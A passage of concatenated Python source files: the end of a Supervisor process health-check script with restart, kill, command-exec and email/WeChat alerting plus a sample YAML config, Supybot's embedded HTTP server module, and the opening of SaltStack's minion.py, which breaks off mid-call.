check_status = args.get('check_status')
config = args.get('config')
self.log(program, '[Action: %s]', action_type)
action_list = action_type.split(',')
if 'restart' in action_list:
restart_result = self.action_supervisor_restart(program)
msg += '\r\n Restart:%s' % restart_result
elif 'exec' in action_list:
action_exec_cmd = config.get('action_exec_cmd')
exec_result = self.action_exec(program, action_exec_cmd)
msg += '\r\n Exec:%s' % exec_result
elif 'kill' in action_list:
pid_get = config.get('pidGet', 'supervisor')
pid_file = config.get('pidFile', )
pid, err = self.get_pid(program, pid_get, pid_file)
kill_result = self.action_kill(program, pid)
msg += '\r\n Kill:%s' % kill_result
if 'email' in action_list and self.mail_config:
self.action_email(program, action_type, msg, check_status)
if 'wechat' in action_list and self.wechat_config:
self.action_wechat(program, action_type, msg, check_status)
def action_supervisor_restart(self, program):
"""
通过supervisor的rpc接口重启进程
:param program:
:return:
"""
result = 'success'
try:
s = self.get_supervisord_conn()
info = s.supervisor.getProcessInfo(program)
except Exception as e:
result = 'Get %s ProcessInfo Error: %s' % (program, e)
self.log(program, '[Action: restart] %s' % result)
return result
if info['state'] == 20:
try:
stop_result = s.supervisor.stopProcess(program)
self.log(program, '[Action: restart] stop result %s', stop_result)
except Fault as e:
result = 'Failed to stop process %s, exiting: %s' % (program, e)
self.log(program, '[Action: restart] stop error %s', result)
return result
time.sleep(1)
info = s.supervisor.getProcessInfo(program)
if info['state'] != 20:
try:
start_result = s.supervisor.startProcess(program)
self.log(program, '[Action: restart] start result %s', start_result)
except Fault as e:
result = 'Failed to start process %s, exiting: %s' % (program, e)
self.log(program, '[Action: restart] start error %s', result)
return result
return result
def action_exec(self, program, cmd):
"""
执行系统命令
:param program:
:param cmd:
:return:
"""
result = 'success'
exitcode, stdout, stderr = shell(cmd)
if exitcode == 0:
self.log(program, "[Action: exec] result success")
else:
result = 'Failed to exec %s, exiting: %s' % (program, exitcode)
self.log(program, "[Action: exec] result %s", result)
return result
def action_kill(self, program, pid):
"""
杀死进程
:param program:
:param pid:
:return:
"""
result = 'success'
if int(pid) < 3:
return 'Failed to kill %s, pid: %s '% (program, pid)
cmd = "kill -9 %s" % pid
exitcode, stdout, stderr = shell(cmd)
if exitcode == 0:
self.log(program, "[Action: kill] result success")
else:
result = 'Failed to kill %s, pid: %s exiting: %s' % (program, pid, exitcode)
self.log(program, "[Action: kill] result %s", result)
return result
def action_email(self, program, action_type, msg, check_status):
"""
发送email
:param program:
:param action_type:
:param msg:
:param check_status:
:return:
"""
ip = ""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
except Exception as e:
self.log(program, '[Action: email] get ip error %s' % e)
finally:
s.close()
hostname = platform.node().split('.')[0]
system_platform = platform.platform()
if check_status == 'success':
subject = "[Supervisor] %s Health check successful" % program
else:
subject = "[Supervisor] %s Health check failed" % program
curr_dt = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
content = """
DateTime: {curr_dt}
Program: {program}
IP: {ip}
Hostname: {hostname}
Platfrom: {system_platform}
Action: {action}
Msg: {msg}
""".format(curr_dt=curr_dt, program=program, ip=ip, hostname=hostname, system_platform=system_platform,
action=action_type, msg=msg)
mail_port = self.mail_config.get('port', '')
mail_host = self.mail_config.get('host', '')
mail_user = self.mail_config.get('user', '')
mail_pass = self.mail_config.get('pass', '')
to_list = self.mail_config.get('to_list', [])
msg = MIMEText(content, _subtype='plain', _charset='utf-8')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = mail_user
msg['to'] = ",".join(to_list)
try:
s = smtplib.SMTP_SSL(mail_host, mail_port)
s.login(mail_user, mail_pass)
s.sendmail(mail_user, to_list, msg.as_string())
s.quit()
except Exception as e:
self.log(program, '[Action: email] send error %s' % e)
return False
self.log(program, '[Action: email] send success.')
return True
def action_wechat(self, program, action_type, msg, check_status):
"""
微信通知
:param program:
:param action_type:
:param msg:
:param check_status:
:return:
"""
host = "qyapi.weixin.qq.com"
corpid = self.wechat_config.get('corpid')
secret = self.wechat_config.get('secret')
agentid = self.wechat_config.get('agentid')
touser = self.wechat_config.get('touser')
toparty = self.wechat_config.get('toparty')
totag = self.wechat_config.get('totag')
headers = {
'Content-Type': 'application/json'
}
access_token_url = '/cgi-bin/gettoken?corpid={id}&corpsecret={crt}'.format(id=corpid, crt=secret)
try:
httpClient = httplib.HTTPSConnection(host, timeout=10)
httpClient.request("GET", access_token_url, headers=headers)
response = httpClient.getresponse()
token = json.loads(response.read())['access_token']
except Exception as e:
self.log(program, '[Action: wechat] get token error %s' % e)
return False
finally:
if httpClient:
httpClient.close()
send_url = '/cgi-bin/message/send?access_token={token}'.format(token=token)
ip = ""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
except Exception as e:
self.log(program, '[Action: wechat] get ip error %s' % e)
finally:
s.close()
hostname = platform.node().split('.')[0]
system_platform = platform.platform()
curr_dt = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if check_status == 'success':
title = "<font color=\"info\">[Supervisor] %s Health check successful</font>" % program
else:
title = "<font color=\"warning\">[Supervisor] %s Health check failed</font>" % program
content = "{title}\n \
> **详情信息**\n \
> DataTime: {curr_dt}\n \
> Program: <font color=\"warning\">{program}</font>\n \
> IP: {ip}\n \
> Hostname: {hostname}\n \
> Platfrom: {platfrom}\n \
> Action: {action}\n \
> Msg: {msg}".format(title=title, curr_dt=curr_dt, program=program, ip=ip, hostname=hostname,
platfrom=system_platform, action=action_type, msg=msg)
data = {
"msgtype": 'markdown',
"agentid": agentid,
"markdown": {'content': content},
"safe": 0
}
if touser:
data['touser'] = touser
if toparty:
data['toparty'] = toparty
if toparty:
data['totag'] = totag
try:
httpClient = httplib.HTTPSConnection(host, timeout=10)
httpClient.request("POST", send_url, json.dumps(data), headers=headers)
response = httpClient.getresponse()
result = json.loads(response.read())
if result['errcode'] != 0:
self.log(program, '[Action: wechat] send faild %s' % result)
return False
except Exception as e:
self.log(program, '[Action: wechat] send error %s' % e)
return False
finally:
if httpClient:
httpClient.close()
self.log(program, '[Action: wechat] send success')
return True
def start(self):
"""
启动检测
:return:
"""
self.log('healthCheck', 'start')
threads = []
threads_data = {}
for key, value in iteritems(self.program_config):
item = value
item['program'] = key
t = WorkerThread(target=self.check, args=(item,), name=key)
threads.append(t)
threads_data[key] = item
for t in threads:
t.setDaemon(True)
t.start()
while 1:
time.sleep(0.1)
for i,t in enumerate(threads):
if not t.isAlive():
thread_name = t.getName()
self.log('[ERROR] Exception in %s (catch by main): %s' % (thread_name, t.get_exception()))
self.log('[ERROR] Create new Thread!')
t = WorkerThread(target=self.check, args=(threads_data[thread_name],), name=thread_name)
t.setDaemon(True)
t.start()
threads[i] = t
if __name__ == '__main__':
# 信号处理
def sig_handler(signum, frame):
print("Exit check!")
sys.exit(0)
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
signal.signal(signal.SIGQUIT, sig_handler)
# 获取当前目录下的配置文件,没有的话就生成个模板
config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config.yaml')
if not os.path.exists(config_file):
example_config = """
config: # 脚本配置名称,请勿更改
# supervisordUrl: http://localhost:9001/RPC2 # supervisor的接口地址, 默认使用本地socket文件unix:///var/run/supervisor.sock
# supervisordUser: user # supervisor中设置的username, 没有设置可不填
# supervisordPass: pass # supervisor中设置的password, 没有设置可不填
# mail: # 邮箱通知配置
# host: 'smtp.test.com'
# port': '465'
# user': 'ops@test.com'
# pass': '123456'
# to_list: ['test@test.com']
# wechat: # 企业微信通知配置
# corpid:
# secret:
# agentid:
# touser:
# toparty:
# totag:
# 内存方式监控
cat1: # supervisor中配置的program名称
type: mem # 检查类型: http,tcp,mem,cpu 默认: http
maxRss: 1024 # 内存阈值, 超过则为检测失败. 单位MB, 默认: 1024
cumulative: True # 是否统计子进程的内存, 默认: False
pidGet: supervisor # 获取pid的方式: supervisor,name,file, 选择name时,按program名称搜索pid,选择file时,需指定pidFile 默认: supervisor
pidFile: /var/run/t.pid # 指定pid文件的路径, 只在pidGet为file的时候有用
periodSeconds: 10 # 检查的频率(以秒为单位), 默认: 5
initialDelaySeconds: 10 # 首次检查等待的时间(以秒为单位), 默认: 1
failureThreshold: 3 # 检查成功后,最少连续检查失败多少次才被认定为失败, 默认: 3
successThreshold: 2 # 失败后检查成功的最小连续成功次数, 默认:1
action: restart,email # 触发的动作: restart,exec,email,wechat (restart和exec互斥,同时设置时restart生效) 默认: restart
execCmd: command # action exec 的执行命令
sendResolved: True # 是否发送恢复通知,仅用作于email,wechat. 默认: False
# cpu方式监控
cat2: # supervisor中配置的program名称
type: cpu # 检查类型: http,tcp,mem,cpu 默认: http
maxCpu: 80 # CPU阈值, 超过则为检测失败. 单位% 默认: 90%
pidGet: supervisor # 获取pid的方式: supervisor,name,file, 选择name时,按program名称搜索pid,选择file时,需指定pidFile 默认: supervisor
pidFile: /var/run/t.pid # 指定pid文件的路径, 只在pidGet为file的时候有用
periodSeconds: 10 # 检查的频率(以秒为单位), 默认: 5
initialDelaySeconds: 10 # 首次检查等待的时间(以秒为单位), 默认: 1
failureThreshold: 3 # 检查成功后,最少连续检查失败多少次才被认定为失败, 默认: 3
successThreshold: 2 # 失败后检查成功的最小连续成功次数, 默认:1
action: restart,email # 触发的动作: restart,exec,email,wechat (restart和exec互斥,同时设置时restart生效) 默认: restart
execCmd: command # action exec 的执行命令
sendResolved: True # 是否发送恢复通知,仅用作于email,wechat. 默认: False
# HTTP方式监控
cat3:
type: http
mode: POST # http动作:POST,GET 默认: GET
host: 127.0.0.1 # 主机地址, 默认: localhost
path: / # URI地址,默认: /
port: 8080 # 检测端口,默认: 80
json: '{"a":"b"}' # POST的json数据
hearders: '{"c":1}' # http的hearder头部数据
username: test # 用于http的basic认证
password: pass # 用于http的basic认证
periodSeconds: 10 # 检查的频率(以秒为单位), 默认: 5
initialDelaySeconds: 10 # 首次检查等待的时间(以秒为单位), 默认: 1
timeoutSeconds: 5 # 检查超时的秒数, 默认: 3
failureThreshold: 3 # 检查成功后,最少连续检查失败多少次才被认定为失败, 默认: 3
successThreshold: 2 # 失败后检查成功的最小连续成功次数, 默认:1
action: restart,email # 触发的动作: restart,exec,email,wechat (restart和exec互斥,同时设置时restart生效) 默认: restart
execCmd: command # action exec 的执行命令
sendResolved: True # 是否发送恢复通知,仅用作于email,wechat. 默认: False
# TCP方式监控
cat4:
type: tcp
host: 127.0.0.1 # 主机地址, 默认: localhost
port: 8082 # 检测端口,默认: 80
periodSeconds: 10 # 检查的频率(以秒为单位), 默认: 5
initialDelaySeconds: 10 # 首次检查等待的时间(以秒为单位), 默认: 1
timeoutSeconds: 5 # 检查超时的秒数, 默认: 3
failureThreshold: 3 # 检查成功后,最少连续检查失败多少次才被认定为失败, 默认: 3
successThreshold: 2 # 失败后检查成功的最小连续成功次数, 默认:1
action: restart,email # 触发的动作: restart,exec,email,wechat (restart和exec互斥,同时设置时restart生效) 默认: restart
execCmd: command # action exec 的执行命令
sendResolved: True # 是否发送恢复通知,仅用作于email,wechat. 默认: False
"""
with open(config_file, 'w') as f:
f.write(example_config)
print("\r\n\r\nThe configuration file has been initialized, please modify the file to start.")
print("Config File: %s\r\n\r\n" % config_file)
sys.exit(0)
with open(config_file) as f:
config = yaml.safe_load(f)
check = HealthCheck(config)
check.start()
|
httpserver.py
|
###
# Copyright (c) 2011, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
An embedded and centralized HTTP server for Supybot's plugins.
"""
import os
import sys
import cgi
import socket
from threading import Event, Thread
from cStringIO import StringIO
from SocketServer import ThreadingMixIn
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# For testing purposes
from SocketServer import StreamRequestHandler
import supybot.log as log
import supybot.conf as conf
import supybot.world as world
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization()
configGroup = conf.supybot.servers.http
class RequestNotHandled(Exception):
pass
DEFAULT_TEMPLATES = {
'index.html': """\
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>""" + _('Supybot Web server index') + """</title>
<link rel="stylesheet" type="text/css" href="/default.css" media="screen" />
</head>
<body class="purelisting">
<h1>Supybot web server index</h1>
<p>""" + _('Here is a list of the plugins that have a Web interface:') +\
"""
</p>
%(list)s
</body>
</html>""",
'generic/error.html': """\
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<link rel="stylesheet" href="/default.css" />
</head>
<body class="error">
<h1>Error</h1>
<p>%(error)s</p>
</body>
</html>""",
'default.css': """\
body {
background-color: #F0F0F0;
}
/************************************
* Classes that plugins should use. *
************************************/
/* Error pages */
body.error {
text-align: center;
}
body.error p {
background-color: #FFE0E0;
border: 1px #FFA0A0 solid;
}
/* Pages that only contain a list. */
.purelisting {
text-align: center;
}
.purelisting ul {
margin: 0;
padding: 0;
}
.purelisting ul li {
margin: 0;
padding: 0;
list-style-type: none;
}
/* Pages that only contain a table. */
.puretable {
text-align: center;
}
.puretable table
{
width: 100%;
border-collapse: collapse;
text-align: center;
}
.puretable table th
{
/*color: #039;*/
padding: 10px 8px;
border-bottom: 2px solid #6678b1;
}
.puretable table td
{
padding: 9px 8px 0px 8px;
border-bottom: 1px solid #ccc;
}
""",
'robots.txt': """""",
}
def set_default_templates(defaults):
for filename, content in defaults.items():
path = conf.supybot.directories.data.web.dirize(filename)
if os.path.isfile(path + '.example'):
os.unlink(path + '.example')
if not os.path.isdir(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
with open(path + '.example', 'a') as fd:
fd.write(content)
set_default_templates(DEFAULT_TEMPLATES)
def get_template(filename):
path = conf.supybot.directories.data.web.dirize(filename)
if os.path.isfile(path):
return open(path, 'r').read()
else:
assert os.path.isfile(path + '.example'), path + '.example'
return open(path + '.example', 'r').read()
class RealSupyHTTPServer(HTTPServer):
# TODO: make this configurable
timeout = 0.5
running = False
def __init__(self, address, protocol, callback):
if protocol == 4:
self.address_family = socket.AF_INET
elif protocol == 6:
self.address_family = socket.AF_INET6
else:
raise AssertionError(protocol)
HTTPServer.__init__(self, address, callback)
self.callbacks = {}
def hook(self, subdir, callback):
if subdir in self.callbacks:
log.warning(('The HTTP subdirectory `%s` was already hooked but '
'has been claimed by another plugin (or maybe you '
'reloaded the plugin and it didn\'t properly unhook. '
'Forced unhook.') % subdir)
self.callbacks[subdir] = callback
def unhook(self, subdir):
callback = self.callbacks.pop(subdir) # May raise a KeyError. We don't care.
callback.doUnhook(self)
return callback
def __str__(self):
return 'server at %s %i' % self.server_address[0:2]
class TestSupyHTTPServer(RealSupyHTTPServer):
def __init__(self, *args, **kwargs):
self.callbacks = {}
def serve_forever(self, *args, **kwargs):
pass
def shutdown(self, *args, **kwargs):
pass
if world.testing:
SupyHTTPServer = TestSupyHTTPServer
else:
SupyHTTPServer = RealSupyHTTPServer
class SupyHTTPRequestHandler(BaseHTTPRequestHandler):
def do_X(self, callbackMethod, *args, **kwargs):
if self.path == '/':
callback = SupyIndex()
elif self.path in ('/robots.txt',):
callback = Static('text/plain; charset=utf-8')
elif self.path in ('/default.css',):
callback = Static('text/css')
elif self.path == '/favicon.ico':
callback = Favicon()
else:
subdir = self.path.split('/')[1]
try:
callback = self.server.callbacks[subdir]
except KeyError:
callback = Supy404()
# Some shortcuts
for name in ('send_response', 'send_header', 'end_headers', 'rfile',
'wfile', 'headers'):
setattr(callback, name, getattr(self, name))
# We call doX, because this is more supybotic than do_X.
path = self.path
if not callback.fullpath:
path = '/' + path.split('/', 2)[-1]
getattr(callback, callbackMethod)(self, path,
*args, **kwargs)
def do_GET(self):
self.do_X('doGet')
def do_POST(self):
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
self.do_X('doPost', form=form)
def do_HEAD(self):
self.do_X('doHead')
def log_message(self, format, *args):
log.info('HTTP request: %s - %s' %
(self.address_string(), format % args))
class SupyHTTPServerCallback(object):
"""This is a base class that should be overriden by any plugin that want
to have a Web interface."""
__metaclass__ = log.MetaFirewall
__firewalled__ = {'doGet': None,
'doPost': None,
'doHead': None,
'doPut': None,
'doDelete': None,
}
fullpath = False
name = "Unnamed plugin"
defaultResponse = _("""
This is a default response of the Supybot HTTP server. If you see this
message, it probably means you are developing a plugin, and you have
neither overriden this message or defined an handler for this query.""")
def doGet(self, handler, path, *args, **kwargs):
handler.send_response(400)
self.send_header('Content-Type', 'text/plain; charset=utf-8; charset=utf-8')
self.send_header('Content-Length', len(self.defaultResponse))
self.end_headers()
self.wfile.write(self.defaultResponse.encode())
doPost = doHead = doGet
def doUnhook(self, handler):
"""Method called when unhooking this callback."""
pass
class Supy404(SupyHTTPServerCallback):
"""A 404 Not Found error."""
name = "Error 404"
fullpath = True
response = _("""
I am a pretty clever IRC bot, but I suck at serving Web pages, particulary
if I don't know what to serve.
What I'm saying is you just triggered a 404 Not Found, and I am not
trained to help you in such a case.""")
def doGet(self, handler, path, *args, **kwargs):
handler.send_response(404)
self.send_header('Content-Type', 'text/plain; charset=utf-8; charset=utf-8')
self.send_header('Content-Length', len(self.response))
self.end_headers()
response = self.response
if sys.version_info[0] >= 3:
response = response.encode()
self.wfile.write(response)
doPost = doHead = doGet
class SupyIndex(SupyHTTPServerCallback):
"""Displays the index of available plugins."""
name = "index"
fullpath = True
defaultResponse = _("Request not handled.")
def doGet(self, handler, path):
plugins = [x for x in handler.server.callbacks.items()]
if plugins == []:
plugins = _('No plugins available.')
else:
plugins = '<ul class="plugins"><li>%s</li></ul>' % '</li><li>'.join(
['<a href="/%s/">%s</a>' % (x,y.name) for x,y in plugins])
response = get_template('index.html') % {'list': plugins}
handler.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if sys.version_info[0] >= 3:
response = response.encode()
self.wfile.write(response)
class Static(SupyHTTPServerCallback):
"""Serves static files."""
fullpath = True
name = 'static'
defaultResponse = _('Request not handled')
def __init__(self, mimetype='text/plain; charset=utf-8'):
super(Static, self).__init__()
self._mimetype = mimetype
def doGet(self, handler, path):
response = get_template(path)
handler.send_response(200)
self.send_header('Content-type', self._mimetype)
self.send_header('Content-Length', len(response))
self.end_headers()
if sys.version_info[0] >= 3:
response = response.encode()
self.wfile.write(response)
class Favicon(SupyHTTPServerCallback):
"""Services the favicon.ico file to browsers."""
name = 'favicon'
defaultResponse = _('Request not handled')
def doGet(self, handler, path):
file_path = conf.supybot.servers.http.favicon()
found = False
if file_path:
try:
icon = open(file_path, 'r')
found = True
except IOError:
pass
if found:
response = icon.read()
filename = file_path.rsplit(os.sep, 1)[1]
if '.' in filename:
ext = filename.rsplit('.', 1)[1]
else:
ext = 'ico'
# I have no idea why, but this headers are already sent.
# self.send_header('Content-Length', len(response))
# self.send_header('Content-type', 'image/' + ext)
# self.end_headers()
self.wfile.write(response)
else:
response = _('No favicon set.')
handler.send_response(404)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if sys.version_info[0] >= 3:
response = response.encode()
self.wfile.write(response)
http_servers = []
def startServer():
"""Starts the HTTP server. Shouldn't be called from other modules.
The callback should be an instance of a child of SupyHTTPServerCallback."""
global http_servers
addresses4 = [(4, (x, configGroup.port()))
for x in configGroup.hosts4().split(' ') if x != '']
addresses6 = [(6, (x, configGroup.port()))
for x in configGroup.hosts6().split(' ') if x != '']
http_servers = []
for protocol, address in (addresses4 + addresses6):
server = SupyHTTPServer(address, protocol, SupyHTTPRequestHandler)
Thread(target=server.serve_forever, name='HTTP Server').start()
http_servers.append(server)
log.info('Starting HTTP server: %s' % str(server))
def stopServer():
"""Stops the HTTP server. Should be run only from this module or from
when the bot is dying (ie. from supybot.world)"""
global http_servers
for server in http_servers:
log.info('Stopping HTTP server: %s' % str(server))
server.shutdown()
server = None
if configGroup.keepAlive():
startServer()
def hook(subdir, callback):
"""Sets a callback for a given subdir."""
if not http_servers:
startServer()
assert isinstance(http_servers, list)
for server in http_servers:
server.hook(subdir, callback)
def unhook(subdir):
"""Unsets the callback assigned to the given subdir, and return it."""
global http_servers
assert isinstance(http_servers, list)
for server in http_servers:
callback = server.unhook(subdir)
if len(server.callbacks) <= 0 and not configGroup.keepAlive():
server.shutdown()
http_servers.remove(server)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import print_function
import copy
import errno
import fnmatch
import hashlib
import logging
import multiprocessing
import os
import re
import salt
import signal
import sys
import threading
import time
import traceback
import types
from random import randint, shuffle
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit
)
import salt.client
import salt.crypt
import salt.loader
import salt.payload
import salt.utils
import salt.utils.args
import salt.utils.event
import salt.utils.schedule
from salt._compat import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if opts.get('file_client', 'remote') == 'local' and check_dns:
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: {0} not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.warn(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
'''
fn_ = os.path.join(cachedir, 'proc')
if not os.path.isdir(fn_):
# proc_dir is not present, create it
os.makedirs(fn_)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or string_kwarg.keys()[0] in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in arg.iteritems():
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in data.items():
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if self.opts.get('file_client', 'remote') == 'remote':
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
self.opts['_safe_auth'] = False
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules()
else:
self.gen_modules()
def gen_modules(self):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
id_hash = hash_type(self.opts['id']).hexdigest()
if self.opts.get('hash_type', 'md5') == 'sha256':
id_hash = id_hash[:10]
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.check_ipc_path_max_len(epull_uri)
log.debug(
